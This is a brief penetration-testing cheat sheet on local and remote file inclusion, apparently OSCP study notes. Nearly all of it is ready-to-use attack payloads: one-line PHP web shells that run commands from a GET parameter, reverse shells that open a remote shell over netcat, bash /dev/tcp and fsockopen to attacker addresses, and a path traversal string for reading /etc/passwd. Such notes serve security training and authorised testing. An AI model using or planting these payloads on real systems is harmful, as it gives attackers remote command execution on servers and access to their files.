LFI/RFI

Pentestmonkeys /usr/share/webshells/php/php-reverse-shell.php

<?php echo shell_exec("nc $TARGET_IP -e /bin/sh") ?>

<?php echo system($_GET["cmd"]);?>
<?php echo shell_exec($_GET["cmd"]);?>

Reverse TCP shell without netcat

<?php echo shell_exec('/bin/bash -i >& /dev/tcp/10.11.0.98/443 0>&1');?>

<?php $sock=fsockopen("127.0.0.1",1337); exec("/bin/sh -i <&3 >&3 2>&3");?>

../../../../../../../../../etc/passwd

Notes

• Some versions of netcat does not support -e flag

References

• https://awakened1712.github.io/oscp/oscp-lfi-rfi/